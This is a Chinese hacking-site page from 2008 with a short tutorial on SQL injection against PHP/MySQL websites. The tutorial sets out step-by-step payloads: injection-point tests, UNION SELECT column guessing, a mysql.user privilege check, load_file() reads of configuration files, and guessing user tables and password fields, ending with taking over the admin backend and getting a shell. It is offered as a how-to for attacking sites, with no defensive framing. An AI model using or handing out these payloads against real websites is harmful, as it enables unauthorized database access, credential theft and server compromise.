通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
PHP难吗?PHP脚本注入的简单步骤
责任编辑:酷酷の鱼   更新日期:2008-3-13
 

来源:安全中国

1~判断注入点~ :’;and 1=1;and 1=2                        -------(跟ASP一样)
2~判断是否能进行UNION查询~:and ord(mid(version(),1,1))>51                 -------(通过版本判断4.0以上可用UNION查询)
3~利用order by 暴字段~:order by X                                                            -------(X为数字 如果返回正常则说明字段大于X)
4~利用union来查询准确字段~: and 1=2 union select 1,2,3,.......                 -------(返回正常,就说明猜到准确字段数。)
5~判断数据库连接帐号有没有写权限~:and (select count(*) from mysql.user)>0  ------- (如果返回错误我们就猜管理员的帐号密码如果返回正常,则可以通过
and 1=2 union select 1,2,3,4,5,6, load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 [注意:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件])
6~猜解XXXX表~:and 1=2 union select 1,2,3,4,5,6.... from user                 --------(XXXX为表单名,返回正常,说明存在这个表)
7~猜XXX字段~:and 1=2 union select 1,username,3,4,5,6.... from XXXX     -------(同样道理,自己替换,如果在2字段显示出字段内容则存在些字段)
8~同理再猜解password字段,猜解成功再找后台登录上SHELL~

  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    固顶文章 Delphi编程培训班开课了
    普通文章 万元赏金 寻找动易SiteWeaver CMS/eShop 产品安全漏洞
    普通文章 discuz安全提问算法
    普通文章 Digitize CAPTCHA + 模板制作方法
    普通文章 PHP难吗?PHP脚本注入的简单步骤
    普通文章 雷驰新闻发布管理系统v3.0漏洞很简单
    普通文章 Radmin软件的一次提权技巧
    推荐文章 推荐:Windows Server 2003搭建VPN服务器
    普通文章 Serv-U保存即生效命令
    普通文章 瑞星公司03月13日发布 每日计算机病毒及木马播报
    热门文章
    普通文章Sun:收购MySQL是现代软件史上最重要收购
    普通文章病毒作者创新使用打包技术导致分析成本激增
    普通文章木马--黑客的利器
    普通文章区分正邪两类黑客的四大主要行为
    普通文章安全基础:奥运期间安全防护 之即时通信工具安全
    普通文章真实世界忠告 同样适用于保证网络安全
    推荐文章推荐:教你从原理入手扼杀传播病毒恶意网页
    普通文章公安部:国家信息安全等级保护工作稳步推进
    普通文章“虚拟警察”见效果 有害信息降70%
    普通文章社保查询系统泄露个人信息 该系统已运转八年
    精彩专题